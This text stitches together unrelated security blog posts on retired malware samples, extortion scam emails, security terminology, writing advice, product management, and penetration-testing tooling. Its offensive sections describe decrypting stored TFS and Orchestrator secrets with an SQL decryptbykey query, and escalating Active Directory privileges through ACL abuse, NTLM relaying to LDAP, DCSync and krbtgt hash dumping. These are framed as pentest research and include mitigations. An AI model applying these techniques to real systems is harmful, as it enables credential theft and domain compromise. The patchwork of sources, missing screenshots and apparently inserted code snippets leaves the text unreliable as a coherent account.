I’m always on the quest for real-world malware samples that help educate professionals on how to analyze malicious software. As techniques and technologies change, I introduce new specimens and retire old ones from the reverse-engineering course I teach at SANS Institute. Here are some of the legacy samples that were once present in FOR610 materials. Though these malicious programs might not appear relevant anymore, aspects of their functionality are present even in modern malware.

A Backdoor with a Backdoor

To teach fundamental aspects of code-based and behavioral malware analysis, the FOR610 course examined Slackbot at one point. It was an IRC-based backdoor, which its author “slim” distributed as a compiled Windows executable without source code.

Dated April 18, 2000, Slackbot came with a builder that allowed its user to customize the name of the IRC server and channel it would use for Command and Control (C2). Slackbot documentation explained how the remote attacker could interact with the infected system over their designated channel and included this taunting note:

“don’t bother me about this, if you can’t figure out how to use it, you probably shouldn’t be using a computer. have fun. –slim”

Those who reverse-engineered this sample discovered that it had undocumented functionality. In addition to connecting to the user-specified C2 server, the specimen also reached out to a hardcoded server that “slim” controlled. The #penix channel gave “slim” the ability to take over all the botnets that his or her “customers” were building for themselves.

It turned out this backdoor had a backdoor! Not surprisingly, backdoors continue to be present in today’s “hacking” tools. For example, I came across a DarkComet RAT builder that was surreptitiously bundled with a DarkComet backdoor of its own.

You Are an Idiot

The FOR610 course used an example of a simple malevolent web page to introduce the techniques for examining potentially-malicious websites. The page, captured below, was a nuisance that insulted its visitors with the following message:

When the visitor attempted to navigate away from the offending site, its JavaScript popped up new instances of the page, making it very difficult to leave. Moreover, each instance of the page played the following jingle on the victim’s speakers. “You are an idiot,” the song exclaimed. “Ahahahahaha-hahahaha!” The cacophony of multiple windows blasting this jingle was overwhelming.


A while later I came across a network worm that played this sound file on victims’ computers, though I cannot find that sample anymore. While writing this post, I was surprised to discover a version of this page, sans the multi-window JavaScript trap, residing on Maybe it’s true what they say: a good joke never gets old.

Clipboard Manipulation

When Flash reigned supreme among banner ad technologies, the FOR610 course covered several examples of such forms of malware. One of the Flash programs we analyzed was a malicious version of the ad pictured below:

At one point, visitors to legitimate websites, such as MSNBC, were reporting that their clipboards appeared “hijacked” when the browser displayed this ad. The advertisement, implemented as a Flash program, was using the ActionScript setClipboard function to replace victims’ clipboard contents with a malicious URL.

The attacker must have expected the victims to blindly paste the URL into messages without looking at what they were sharing. I remembered this sample when reading about a more recent example of malware that replaced Bitcoin addresses stored in the clipboard with the attacker’s own Bitcoin address for payments.

As malware evolves, so do our analysis approaches, and so do the exercises we use in the FOR610 malware analysis course.  It’s fun to reflect upon the samples that at some point were present in the materials. After all, I’ve been covering this topic at SANS Institute since 2001. It’s also interesting to notice that, despite the evolution of the threat landscape, many of the same objectives and tricks persist in today’s malware world.

Scammers Use Breached Personal Details to Persuade Victims

Scammers use a variety of social engineering tactics when persuading victims to follow the desired course of action. One example of this approach involves including in the fraudulent message personal details about the recipient to “prove” that the victim is in the miscreant’s grip. In reality, the sender probably obtained the data from one of the many breaches that provide swindlers with an almost unlimited supply of personal information.

Personalized Porn Extortion Scam

Consider the case of an extortion scam in which the sender claims to have evidence of the victim’s pornography-viewing habits. The scammer demands payment in exchange for suppressing the “compromising evidence.” A variation of this technique was documented by Stu Sjouwerman at KnowBe4 in 2017. In a modern twist, the scammer includes personal details about the recipient—beyond merely the person’s name—such as the password the victim used:

“****** is one of your password and now I will directly come to the point. You do not know anything about me but I know alot about you and you must be thinking why are you getting this e mail, correct?

I actually setup malware on porn video clips (adult porn) & guess what, you visited same adult website to experience fun (you get my drift). And when you got busy enjoying those videos, your web browser started out operating as a RDP (Remote Desktop Protocol) that has a backdoor which provided me with accessibility to your screen and your web camera controls.”

The email includes a demand for payment via cryptocurrency such as Bitcoin to ensure that “Your naughty secret remains your secret.” The sender calls this “privacy fees.” Variations on this scheme are documented in the Blackmail Email Scam thread on Reddit.

The inclusion of the password that the victim used at some point in the past lends credibility to the sender’s claim that the scammer knows a lot about the recipient. In reality, the miscreant likely obtained the password from one of many data dumps that include email addresses, passwords, and other personal information stolen from breached websites.

Data Breach Lawsuit Scam

In another scenario, the scammer uses the knowledge of the victim’s phone number to “prove” possession of sensitive data. The sender poses as an entity that’s preparing to sue the company that allegedly leaked the data:

“Your data is compromised. We are preparing a lawsuit against the company that allowed a big data leak. If you want to join and find out what data was lost, please contact us via this email. If all our clients win a case, we plan to get a large amount of compensation and all the data and photos that were stolen from the company. We have all information to win. For example, we write to your email and include part your number ****** from a large leak.”

The miscreant’s likely objective is to solicit additional personal information from the victim under the guise of preparing the lawsuit, possibly requesting a social security number, bank account details, etc. The sender might have obtained the victim’s name, email address and phone number from a breached data dump and is phishing for other, more lucrative data.

What to Do?

If you receive a message that solicits payment or confidential data under the guise of knowing some of your personal information, be skeptical. This is probably a mass-mailed scam and your best approach is usually to ignore the message. In addition, keep an eye on the breaches that might have compromised your data using the free and trusted service Have I Been Pwned by Troy Hunt, change your passwords when this site tells you they’ve been breached, and don’t reuse passwords across websites or apps.
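On that last point: the Pwned Passwords service (part of Have I Been Pwned) can be queried without ever revealing a password, using its k-anonymity range API, where only the first five hex characters of the password's SHA-1 hash leave your machine. The sketch below computes that prefix/suffix split; the actual HTTPS lookup against the api.pwnedpasswords.com range endpoint is left as a comment.

```python
import hashlib

def hibp_split(password: str):
    """Split a password's SHA-1 hash for a k-anonymity range query:
    the 5-character prefix is sent to the API, the suffix stays local."""
    digest = hashlib.sha1(password.encode("utf-8")).hexdigest().upper()
    return digest[:5], digest[5:]

prefix, suffix = hibp_split("password")
print(prefix)   # 5BAA6

# A real check would GET https://api.pwnedpasswords.com/range/<prefix>
# and search the returned list of suffixes for `suffix`; a hit means
# the password has appeared in a known breach.
```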

Sometimes an extortion note is real and warrants a closer look and potentially law enforcement involvement. Only you know your situation and can decide on the best course of action. Fortunately, every example that I’ve had a chance to examine turned out to be a social engineering trick that recipients were best off ignoring.

To better understand persuasion tactics employed by online scammers, take a look at my earlier articles on this topic:


Cyber is Cyber is Cyber

If you’re in the business of safeguarding data and the systems that process it, what do you call your profession? Are you in cybersecurity? Information security? Computer security, perhaps? The words we use, and the way in which the meaning we assign to them evolves, reflects the reality behind our language. If we examine the factors that influence our desire to use one security title over the other, we’ll better understand the nature of the industry and its driving forces.

Until recently, I had no doubts about describing my calling as an information security professional. Yet the term cybersecurity is growing in popularity. This might be because the industry continues to embrace the lexicon used in government and military circles, where cyber reigns supreme, and because of the familiarity of the word cyber among non-experts.

When I asked on Twitter about people’s opinions on these terms, I received several responses, including the following:

  • Danny Akacki was surprised to discover, after some research, that the origin of cyber goes deeper than the marketing buzzword that many industry professionals believe it to be.
  • Paul Melson and Loren Dealy Mahler viewed cybersecurity as a subset of information security. Loren suggested that cyber focuses on technology, while Paul considered cyber as a set of practices related to interfacing with adversaries.
  • Maggie O’Reilly mentioned Gartner’s model that, in contrast, used cybersecurity as the overarching discipline that encompasses information security and other components.
  • Rik Ferguson also advocated for cybersecurity over information security, viewing cyber as a term that encompasses multiple components: people, systems, as well as information.
  • Jessica Barker explained that “people outside of our industry relate more to cyber,” proposing that if we want them to engage with us, “we would benefit from embracing the term.”

In line with Danny’s initial negative reaction to the word cyber, I’ve perceived cybersecurity as a term associated with heavy-handed marketing practices. Also, like Paul, Loren, Maggie and Rik, I have a sense that cybersecurity and information security are interrelated and somehow overlap. Jessica’s point regarding laypersons relating to cyber piqued my interest and, ultimately, changed my opinion of this term.

There is a way to dig into cybersecurity and information security to define them as distinct terms. For instance, NIST defines cybersecurity as:

“Prevention of damage to, protection of, and restoration of computers, electronic communications systems, electronic communications services, wire communication, and electronic communication, including information contained therein, to ensure its availability, integrity, authentication, confidentiality, and nonrepudiation.”

Compare that description to NIST’s definition of information security:

“The protection of information and information systems from unauthorized access, use, disclosure, disruption, modification, or destruction in order to provide confidentiality, integrity, and availability.”

From NIST’s perspective, cybersecurity is about safeguarding electronic communications, while information security is about protecting information in all forms. This implies that, at least according to NIST, cybersecurity is a subset of information security. While this nuance might be important in some contexts, such as regulations, the distinction probably won’t remain relevant for long, because of the points Jessica Barker raised.

Jessica’s insightful post on the topic highlights the need for security professionals to use language that our non-specialist stakeholders and people at large understand. She outlines a brief history that lends credence to the word cyber. She also explains that while most practitioners seem to prefer information security, this term is least understood by the public, where cybersecurity is much more popular. She explains that:

“The media have embraced cyber. The board has embraced cyber. The public have embraced cyber. Far from being meaningless, it resonates far more effectively than ‘information’ or ‘data’. So, for me, the use of cyber comes down to one question: what is our goal? If our goal is to engage with and educate as broad a range of people as possible, using ‘cyber’ will help us do that. A bridge has been built, and I suggest we use it.”

Technology and the role it plays in our lives continues to change. Our language evolves with it. I’m convinced that the distinction between cybersecurity and information security will soon become purely academic and ultimately irrelevant even among industry insiders. If the world has embraced cyber, security professionals will end up doing so as well. While I’m unlikely to wean myself off information security right away, I’m starting to gradually transition toward cybersecurity.

Communicating About Cybersecurity in Plain English

When cybersecurity professionals communicate with regular, non-technical people about IT and security, they often use language that virtually guarantees that the message will be ignored or misunderstood. This is often a problem for information security and privacy policies, which are written by subject-matter experts for people who lack the expertise. If you’re creating security documents, take extra care to avoid jargon, wordiness and other issues that plague technical texts.

To strengthen your ability to communicate geeky concepts in plain English, consider the following exercise: Take a boring paragraph from a security assessment report or an information security policy and translate it into a sentence that’s no longer than 15 words without using industry terminology. I’m not suggesting that the resulting statement should replace the original text; instead, I suspect this exercise will train you to write more plainly and succinctly.

For example, I extracted and slightly modified a few paragraphs from the Princeton University Information Security Policy, just so that I could experiment with some public document written in legalese. I then attempted to relay the idea behind each paragraph in the form of a 3-line haiku (5-7-5 syllables per line):

This Policy applies to all Company employees, contractors and other entities acting on behalf of Company. This policy also applies to other individuals and entities granted use of Company information, including, but not limited to, contractors, temporary employees, and volunteers.

If you can read this,
you must follow the rules that
are explained below.

When disclosing Confidential information, the proposed recipient must agree (i) to take appropriate measures to safeguard the confidentiality of the information; (ii) not to disclose the information to any other party for any purpose absent the Company’s prior written consent.

Don’t share without a
contract any information
that’s confidential.

All entities granted use of Company Information are expected to: (i) understand the information classification levels defined in the Information Security Policy; (ii) access information only as needed to meet legitimate business needs.

Know your duties for
safeguarding company info.
Use it properly.

By challenging yourself to shorten a complex concept into a single sentence, you motivate yourself to determine the most important aspect of the text, so you can better communicate it to others. This approach might be especially useful for fine-tuning executive summaries, which often warrant careful attention and wordsmithing. This is just one of the ways in which you can improve your writing skills with deliberate practice.

Introducing Team Foundation Server decryption tool

During penetration tests we sometimes encounter servers running software that use sensitive information as part of the underlying process, such as Microsoft’s Team Foundation Server (TFS). TFS can be used for developing code, version control and automatic deployment to target systems. This blogpost provides two tools to decrypt sensitive information that is stored in the TFS database.

Decrypting TFS secrets

Within Team Foundation Server (TFS), it is possible to automate the build, testing and deployment of new releases. With the use of variables it is possible to create a generic deployment process once and customize it per environment.1 Sometimes specific tasks need a set of credentials or other sensitive information, and therefore TFS supports encrypted variables. With an encrypted variable, the contents of the variable are encrypted in the database and not visible to the user of TFS.


However, with the correct amount of access rights to the database it is possible to decrypt the encrypted content. Sebastian Solnica wrote a blogpost about this, which can be read at the following link:

Fox-IT wrote a PowerShell script that uses the information mentioned in the blogpost. While the blogpost mainly focused on the decryption technique, the PowerShell script is built with usability in mind. The script will query all needed values and display the decrypted values. An example can be seen in the following screenshot:


The script can be downloaded from Fox-IT’s Github repository:

It is also possible to use the script in Metasploit. Fox-IT wrote a post module that can be used through a meterpreter session. The result of the script can be seen in the screenshot below.


There is a pull request pending and hopefully the module will be part of the Metasploit Framework soon. The pull request can be found here:



Introducing Orchestrator decryption tool

Researched and written by Donny Maasland and Rindert Kramer


During penetration tests we sometimes encounter servers running software that use sensitive information as part of the underlying process, such as Microsoft’s System Center Orchestrator.
According to Microsoft, Orchestrator is a workflow management solution for data centers and can be used to automate the creation, monitoring and deployment of resources in your environment.1 This blogpost covers the encryption aspect of Orchestrator and new tools to decrypt sensitive information that is stored in the Orchestrator database.

Orchestrator, variables, encryption and SQL

In Orchestrator, it is possible to create variables that can be used in runbooks. One of the possibilities is to store credentials in these variables. These variables can then be used to authenticate with other systems. Runbooks can use these variables to create an authenticated session towards the target system and run all the steps that are defined in the runbook in the context of the credentials that are specified in the variable.

Information, such as passwords, that is of a sensitive nature can be encrypted by using encrypted variables. The contents of these variables are stored encrypted in the database when they are created and are decrypted when they are used in the runbooks. The picture below displays the dialog to create an encrypted variable.


Orchestrator uses the internal encryption functionality of Microsoft SQL Server2 (MSSQL). The decryption keys are stored in the SYS database and have to be loaded into the SQL session in order to decrypt data.

To decrypt the data, we need the encrypted content first. The following query returns the encrypted content:


If there are secret variables stored in the database, this will result in encrypted data, such as:

The data between the \`d.T.~De/ markers is the data we are interested in, which leaves us with the following string:
Please note that the \`d.T.~De/ value might differ per data type.
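As a sketch of that extraction step, the marker-delimited ciphertext can be pulled out programmatically. This assumes the marker is the literal string shown above; as noted, the marker value might differ per data type:

```python
# Hedged sketch: extract the hex ciphertext sitting between the two
# marker occurrences in an Orchestrator VALUE field. The marker below is
# an assumption based on the example above and may differ per data type.
MARKER = "`d.T.~De/"

def extract_ciphertext(raw_value: str) -> str:
    """Return the data enclosed between the first two marker occurrences."""
    start = raw_value.index(MARKER) + len(MARKER)
    end = raw_value.index(MARKER, start)
    return raw_value[start:end]
```

The resulting hex string is what gets fed to the decryption query shown further below.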

Since this data is encrypted, the decryption key needs to be loaded in the SQL session. To establish this, we open an SQL session and run the following query:


This will load the decryption key into the SQL session.

Now we run this string against the decryptbykey function in MSSQL3 to decrypt the content with the encryption key that was loaded earlier in the SQL session. If successful, this will result in a varbinary object that we need to convert to nvarchar for human readable output.
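The varbinary-to-nvarchar step amounts to interpreting the decrypted bytes as UTF-16LE text, which is the encoding behind nvarchar. Outside of SQL Server, the same conversion can be sketched as:

```python
# Hedged sketch of the final conversion step: nvarchar data is UTF-16LE,
# so the decrypted varbinary blob is decoded accordingly.
def varbinary_to_text(decrypted: bytes) -> str:
    """Decode decryptbykey output (varbinary) into readable text."""
    return decrypted.decode("utf-16-le")
```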

The complete SQL query will look like this:

SELECT convert(nvarchar, decryptbykey(0x00F04DA615688A4C96C2891105226AE90100000059A187C285E8AC6C1090F48D0BFD2775165F9558EAE37729DA43BE92AD133CF697D2C5CC1E6E27E534754099780A0362C794C95F3747A1E65E869D2D43EC3597));

Executing this query will return the unencrypted value of the variable, as can be seen in the following screenshot.

Automating the process

Fox-IT created a script that automates this process. The script queries the secrets and decrypts them automatically. The result of the script can be seen in the screenshot below.

The script can be downloaded from Fox-IT’s Github repository:

Fox-IT also wrote a Metasploit post module to run this script through a meterpreter.

The Metasploit module supports integrated login. Optionally, it is possible to use MSSQL authentication by specifying the username and password parameters. By default, the script will use the ‘Orchestrator’ database, but it is also possible to specify another database with the database parameter. Fox-IT did a pull request to add this module to Metasploit, so hopefully the module will be available soon. The pull request can be found here:



Escalating privileges with ACLs in Active Directory

Researched and written by Rindert Kramer and Dirk-jan Mollema


During internal penetration tests, it happens quite often that we manage to obtain Domain Administrative access within a few hours. Contributing to this are insufficient system hardening and the use of insecure Active Directory defaults. In such scenarios publicly available tools help in finding and exploiting these issues and often result in obtaining domain administrative privileges. This blogpost describes a scenario where our standard attack methods did not work and where we had to dig deeper in order to gain high privileges in the domain. We describe more advanced privilege escalation attacks using Access Control Lists and introduce a new tool called Invoke-Aclpwn and an extension to ntlmrelayx that automate the steps for this advanced attack.

AD, ACLs and ACEs

As organizations become more mature and aware when it comes to cyber security, we have to dig deeper in order to escalate our privileges within an Active Directory (AD) domain. Enumeration is key in these kinds of scenarios. Often overlooked are the Access Control Lists (ACLs) in AD.

An ACL is a set of rules that define which entities have which permissions on a specific AD object. These objects can be user accounts, groups, computer accounts, the domain itself and many more. The ACL can be configured on an individual object such as a user account, but can also be configured on an Organizational Unit (OU), which is like a directory within AD. The main advantage of configuring the ACL on an OU is that, when configured correctly, all descendant objects will inherit the ACL. The ACL of the OU wherein the objects reside contains an Access Control Entry (ACE) that defines the identity and the corresponding permissions that are applied to the OU and/or descending objects.

The identity that is specified in the ACE does not necessarily need to be the user account itself; it is a common practice to apply permissions to AD security groups. By adding the user account as a member of such a security group, the user account is granted the permissions that are configured within the ACE, because the user is a member of that security group.

Group memberships within AD are applied recursively. Let’s say that we have three groups:

  • Group_A
    • Group_B
      • Group_C

Group_C is a member of Group_B which itself is a member of Group_A. When we add Bob as a member of Group_C, Bob will not only be a member of Group_C, but also be an indirect member of Group_B and Group_A. That means that when access to an object or a resource is granted to Group_A, Bob will also have access to that specific resource. This resource can be an NTFS file share, printer or an AD object, such as a user, computer, group or even the domain itself.
Providing permissions and access rights with AD security groups is a great way of maintaining and managing (access to) IT infrastructure. However, it may also lead to potential security risks when groups are nested too often. As written, a user account will inherit all permissions to resources that are set on the group of which the user is a (direct or indirect) member. If Group_A is granted access to modify the domain object in AD, it is quite trivial to discover that Bob inherited these permissions. However, if the user is a direct member of only one group, and that group is indirectly a member of 50 other groups, it will take much more effort to discover these inherited permissions.
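The recursive membership resolution from the Bob example above can be sketched as follows, using the hypothetical group names from that example:

```python
# Sketch: resolve effective (direct + indirect) group membership,
# illustrating why Bob inherits Group_A's permissions. The mapping is
# the hypothetical nesting from the example above, not real AD data.
member_of = {
    "Bob": {"Group_C"},
    "Group_C": {"Group_B"},
    "Group_B": {"Group_A"},
}

def effective_groups(principal: str) -> set:
    """Walk memberships recursively, guarding against cyclic nesting."""
    seen = set()
    stack = list(member_of.get(principal, ()))
    while stack:
        group = stack.pop()
        if group not in seen:
            seen.add(group)
            stack.extend(member_of.get(group, ()))
    return seen
```

Any permission granted to Group_A therefore also applies to Bob, even though Bob appears nowhere in Group_A's direct member list.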

Escalating privileges in AD with Exchange

During a recent penetration test, we managed to obtain a user account that was a member of the Organization Management security group. This group is created when Exchange is installed and provides access to Exchange-related activities. Besides access to these Exchange settings, it also allows its members to modify the group membership of other Exchange security groups, such as the Exchange Trusted Subsystem security group. This group is a member of the Exchange Windows Permissions security group.


By default, the Exchange Windows Permissions security group has writeDACL permission on the domain object of the domain where Exchange was installed. 1


The writeDACL permission allows an identity to modify permissions on the designated object (in other words: modify the ACL), which means that by being a member of the Organization Management group we were able to escalate our privileges to those of a domain administrator.
To exploit this, we added our user account that we obtained earlier to the Exchange Trusted Subsystem group. We logged on again (because security group memberships are only loaded during login) and now we were a member of the Exchange Trusted Subsystem group and the Exchange Windows Permission group, which allowed us to modify the ACL of the domain.

If you have access to modify the ACL of an AD object, you can assign permissions to an identity that allows them to write to a certain attribute, such as the attribute that contains the telephone number. Besides assigning read/write permissions to these kinds of attributes, it is also possible to assign permissions to extended rights. These rights are predefined tasks, such as the right of changing a password, sending email to a mailbox and many more2. It is also possible to add any given account as a replication partner of the domain by applying the following extended rights:

  • Replicating Directory Changes
  • Replicating Directory Changes All

When we set these permissions for our user account, we were able to request the password hash of any user in the domain, including that of the krbtgt account of the domain. More information about this privilege escalation technique can be found on the following GitHub page:

Obtaining a user account that is a member of the Organization Management group is not something that happens quite often. Nonetheless, this technique can be used on a broader basis. It is possible that the Organization Management group is managed by another group. That group may be managed by another group, et cetera. That means that it is possible that there is a chain throughout the domain that is difficult to discover but, if correlated correctly, might lead to full compromise of the domain.

To help exploit this chain of security risks, Fox-IT wrote two tools. The first tool is written in PowerShell and can be run within or outside an AD environment. The second tool is an extension to the ntlmrelayx tool. This extension allows the attacker to relay identities (user accounts and computer accounts) to Active Directory and modify the ACL of the domain object.


Invoke-ACLPwn is a PowerShell script that is designed to run with integrated credentials as well as with specified credentials. The tool works by creating an export with SharpHound3 of all ACLs in the domain, as well as the group membership of the user account that the tool is running under. If the user does not already have writeDACL permission on the domain object, the tool will enumerate all ACEs of the ACL of the domain. Every identity in an ACE has an ACL of its own, which is added to the enumeration queue. If the identity is a group and the group has members, every group member is added to the enumeration queue as well. As you can imagine, this takes some time to enumerate, but could end up with a chain to obtain writeDACL permission on the domain object.
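The enumeration described above can be pictured as a graph search. The sketch below is a simplified illustration, not Invoke-ACLPwn's actual data model: identities and ACEs are reduced to a hypothetical "who controls whom" mapping, and a breadth-first search looks for a chain from the current user to writeDACL on the domain object:

```python
from collections import deque

# Hypothetical, simplified ACL export: object -> identities that hold an
# interesting ACE (e.g. write access) over it. Here, controlling "User"
# lets you reach "GroupA", which controls "GroupB", which holds
# writeDACL on "Domain". These names are illustrative only.
controlled_by = {
    "GroupA": ["User"],
    "GroupB": ["GroupA"],
    "Domain": ["GroupB"],
}

def find_chain(start, target):
    """BFS backwards from the target object to the starting identity.

    Returns the chain in exploit order (start -> target), or None if no
    path exists.
    """
    queue = deque([[target]])
    while queue:
        path = queue.popleft()
        for controller in controlled_by.get(path[-1], []):
            if controller == start:
                return [start] + path[::-1]
            queue.append(path + [controller])
    return None
```

Each hop in the returned chain corresponds to one exploitation step (a group membership to add, or an ACL to modify), which matches the step-by-step exploitation list that follows.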


When the chain has been calculated, the script will then start to exploit every step in the chain:

  • The user is added to the necessary groups
  • Two ACEs are added to the ACL of the domain object:
    • Replicating Directory Changes
    • Replicating Directory Changes All
  • Optionally, Mimikatz’ DCSync feature is invoked and the hash of the given user account is requested. By default the krbtgt account will be used.

After the exploitation is done, the script will remove the group memberships that were added during exploitation as well as the ACEs in the ACL of the domain object.

To test the script, we created 26 security groups. Every group was a member of another group (testgroup_a was a member of testgroup_b, which itself was a member of testgroup_c, et cetera, up until testgroup_z).
The security group testgroup_z had the permission to modify the membership of the Organization Management security group. As written earlier, this group had the permission to modify the group membership of the Exchange Trusted Subsystem security group. Being a member of this group will give you the permission to modify the ACL of the domain object in Active Directory.

We now had a chain of 31 links:

  • Indirect member of 26 security groups
  • Permission to modify the group membership of the Organization Management security group
  • Membership of the Organization Management
  • Permission to modify the group membership of the Exchange Trusted Subsystem security group
  • Membership of the Exchange Trusted Subsystem and the Exchange Windows Permission security groups

The result of the tool can be seen in the following screenshot:


Please note that in this example we used the ACL configuration that was configured
during the installation of Exchange. However, the tool does not rely on Exchange
or any other product to find and exploit a chain.

Currently, only the writeDACL permission on the domain object is enumerated
and exploited. There are other types of access rights, such as owner, writeOwner, genericAll, et cetera, that can be exploited on other objects as well.
These access rights are explained in depth in this whitepaper by the BloodHound team.
Updates to the tool that also exploit these privileges will be developed and released in the future.
The Invoke-ACLPwn tool can be downloaded from our GitHub here:


Last year we wrote about new additions to ntlmrelayx allowing relaying to LDAP, which allows for domain enumeration and escalation to Domain Admin by adding a new user to the Directory. Previously, the LDAP attack in ntlmrelayx would check if the relayed account was a member of the Domain Admins or Enterprise Admins group, and escalate privileges if this was the case. It did this by adding a new user to the Domain and adding this user to the Domain Admins group.
While this works, this does not take into account any special privileges that a relayed user might have. With the research presented in this post, we introduce a new attack method in ntlmrelayx. This attack involves first requesting the ACLs of important Domain objects, which are then parsed from their binary format into structures the tool can understand, after which the permissions of the relayed account are enumerated.
This takes into account all the groups the relayed account is a member of (including recursive group memberships). Once the privileges are enumerated, ntlmrelayx will check if the user has high enough privileges to allow for a privilege escalation of either a new or an existing user.
For this privilege escalation there are two different attacks. The first is called the ACL attack, in which the ACL on the Domain object is modified and a user under the attacker’s control is granted Replication-Get-Changes-All privileges on the domain, which allows for using DCSync as described in the previous sections. If modifying the domain ACL is not possible, the ability to add members to several high-privilege groups in the domain is considered for a Group attack:

  • Enterprise Admins
  • Domain Admins
  • Backup Operators (who can back up critical files on the Domain Controller)
  • Account Operators (who have control over almost all groups in the domain)

If an existing user was specified using the --escalate-user flag, this user will be given the Replication privileges if an ACL attack can be performed, and added to a high-privilege group if a Group attack is used. If no existing user is specified, the options to create new users are considered. This can be either in the Users container (the default place for user accounts) or in an OrganizationalUnit for which control was delegated, for example, to IT department members.
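The decision logic above can be sketched as follows. The privilege labels and the function itself are illustrative assumptions, not ntlmrelayx's internal representation:

```python
# Hedged sketch of the escalation decision: prefer the ACL attack
# (grant replication rights via the domain ACL), otherwise fall back to
# adding the controlled account to one of the high-privilege groups.
HIGH_PRIV_GROUPS = [
    "Enterprise Admins",
    "Domain Admins",
    "Backup Operators",
    "Account Operators",
]

def pick_escalation(privileges: set) -> str:
    """Choose between the ACL attack and the Group attack."""
    if "writeDACL-on-domain" in privileges:
        return "ACL attack: grant Replication-Get-Changes-All"
    for group in HIGH_PRIV_GROUPS:
        if f"add-member-to:{group}" in privileges:
            return f"Group attack: add user to {group}"
    return "no escalation path"
```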

One may have noticed that we mentioned relayed accounts here instead of relayed users. This is because the attack also works against computer accounts that have high privileges. An example for such an account is the computer account of an Exchange server, which is a member of the Exchange Windows Permissions group in the default configuration. If an attacker is in a position to convince the Exchange server to authenticate to the attacker’s machine, for example by using mitm6 for a network level attack, privileges can be instantly escalated to Domain Admin.

Relaying Exchange account

The NTDS.dit hashes can now be dumped by using impacket or with Mimikatz:


Similarly, if an attacker has administrative privileges on the Exchange server, it is possible to escalate privileges in the domain without the need to dump any passwords or machine account hashes from the system.
Connecting to the attacker from the NT Authority\SYSTEM perspective and authenticating with NTLM is sufficient to authenticate to LDAP. The screenshot below shows the PowerShell function Invoke-WebRequest being called, which will run from a SYSTEM perspective. The flag -UseDefaultCredentials will enable automatic authentication with NTLM.


The 404 error here is expected, as ntlmrelayx serves a 404 page once the relaying attack is complete

It should be noted that relaying attacks against LDAP are possible in the default configuration of Active Directory, since LDAP signing, which partially mitigates this attack, is disabled by default. Even if LDAP signing is enabled, it is still possible to relay to LDAPS (LDAP over SSL/TLS) since LDAPS is considered a signed channel. The only mitigation for this is enabling channel binding for LDAP in the registry.
To get the new features in ntlmrelayx, simply update to the latest version of impacket from GitHub:


As for mitigation, Fox-IT has a few recommendations.

Remove dangerous ACLs
Check for dangerous ACLs with tools such as BloodHound.3 BloodHound can make an export of all ACLs in the domain, which helps with identifying dangerous ACLs.

Remove writeDACL permission for the Exchange Windows Permissions group
Remove the writeDACL permission for the Exchange Windows Permissions group. The following GitHub page contains a PowerShell script which can assist with this:

Monitor security groups
Monitor (the membership of) security groups that can have a high impact on the domain, such as the Exchange Trusted Subsystem and the Exchange Windows Permissions.

Audit and monitor changes to the ACL
Audit changes to the ACL of the domain. If not done already, it may be necessary to modify the domain controller policy. More information about this can be found on the following TechNet article:

When the ACL of the domain object is modified, an event will be created with event ID 5136. The Windows event log can be queried with PowerShell, so here is a one-liner to get all events from the Security event log with ID 5136:

Get-WinEvent -FilterHashtable @{logname='security'; id=5136}

This event contains the account name and the ACL in a Security Descriptor Definition Language (SDDL) format.


Since this is unreadable for humans, there is a PowerShell cmdlet in Windows 10,
ConvertFrom-SDDL4, which converts the SDDL string into a more readable ACL object.
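On systems without ConvertFrom-SDDL, a first rough look at an SDDL string can be had by splitting out its ACE substrings. The sketch below is a minimal helper, nowhere near a full SDDL parser, and the example descriptor is illustrative:

```python
import re

def split_sddl_aces(sddl: str) -> list:
    """Return the parenthesized ACE strings from an SDDL descriptor.

    In SDDL, the DACL portion lists ACEs as semicolon-delimited fields
    wrapped in parentheses, e.g. (A;;GA;;;SY) for an access-allowed ACE
    granting generic-all to SYSTEM.
    """
    return re.findall(r"\(([^)]*)\)", sddl)
```

Comparing the ACE lists of the event's old and new descriptors gives a quick first indication of what was added or removed.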


If the server runs Windows Server 2016 as operating system, it is also possible to see the original and modified descriptors. For more information:

With this information you should be able to start an investigation to discover what was modified, when it happened, and why.



Security Product Management at Large Companies vs. Startups

Is it better to perform product management of information security solutions at a large company or at a startup? Picking the setting that’s right for you isn’t as simple as craving the exuberant energy of a young firm or coveting the resources and brand of an organization that’s been around for a while. Each environment has its challenges and advantages for product managers. The type of innovation, nature of collaboration, sales dynamics, and cultural nuances are among the factors to consider when deciding which setting is best for you.

The perspective below is based on my product management experiences in the field of information security, though I suspect it’s applicable to product managers in other hi-tech environments.

Product Management at a Large Firm

In the world of information security, industry incumbents are usually large organizations. This is in part because growing in a way that satisfies investors generally requires the financial might, brand and customer access that’s hard for small cyber-security companies to achieve. Moreover, customers who are not early adopters often find it easier to focus their purchasing on a single provider of unified infosec solutions. These dynamics set the context for the product manager’s role at large firms.

Access to Customers

Though the specifics differ across organizations, product management often involves defining capabilities and driving adoption. The product manager’s most significant advantage at a large company is probably access to customers. This is due to the size of the firm’s sales and marketing organization, as well as the large number of companies that have already purchased some of the company’s products.

Such access helps with understanding requirements for new products, improving existing technologies, and finding new customers. For example, you could bring your product to a new geography by using the sales force present in that area without having to hire a dedicated team. Also, it’s easier to upsell a complementary solution than build a new customer relationship from scratch.

Access to Expertise

Another benefit of a large organization is access to funds and expertise that’s sometimes hard to obtain in a young, small company. Instead of hiring a full-time specialist for a particular task, you might be able to draw upon the skills and experience of someone who supports multiple products and teams. In addition, assuming your efforts receive the necessary funding, you might find it easier to pursue product objectives and enter new markets in a way that could be hard for a startup to accomplish. This isn’t always easy, because budgetary planning in large companies can be more onerous than venture capital fundraising.

Organizational Structure

Working in any capacity at an established firm requires that you understand and follow the often-changing bureaucratic processes inherent to any large entity. Depending on the organization’s structure, product managers in such environments might lack the direct control over the teams vital to the success of their product. Therefore, the product manager needs to excel at forming cross-functional relationships and influencing indirectly. (Coincidentally, this is also a key skill-set for many Chief Information Security Officers.)

Sometimes even understanding all of your own objectives and success criteria in such environments can be challenging. It can be even harder to stay abreast of the responsibilities of others in the corporate structure. On the other hand, one of the upsides of a large organization is the room to grow one’s responsibilities vertically and horizontally without switching organizations. This is often impractical in small companies.

What It’s Like at a Large Firm

In a nutshell, these are the characteristics inherent to product management roles at large companies:

  • An established sales organization, which provides access to customers
  • Potentially conflicting priorities and incentives among groups and individuals within the organization
  • Rigid organizational structure and bureaucracy
  • Potentially easier access to funding for sophisticated projects and complex products
  • Possibly easier access to the needed expertise
  • Well-defined career development roadmap

I loved working as a security product manager at a large company. I was able to oversee a range of in-house software products and managed services that focused on data security. One of my solutions involved custom-developed hardware with integrated home-grown and third-party software, serviced by a team of help desk and in-the-field technicians. A fun challenge!

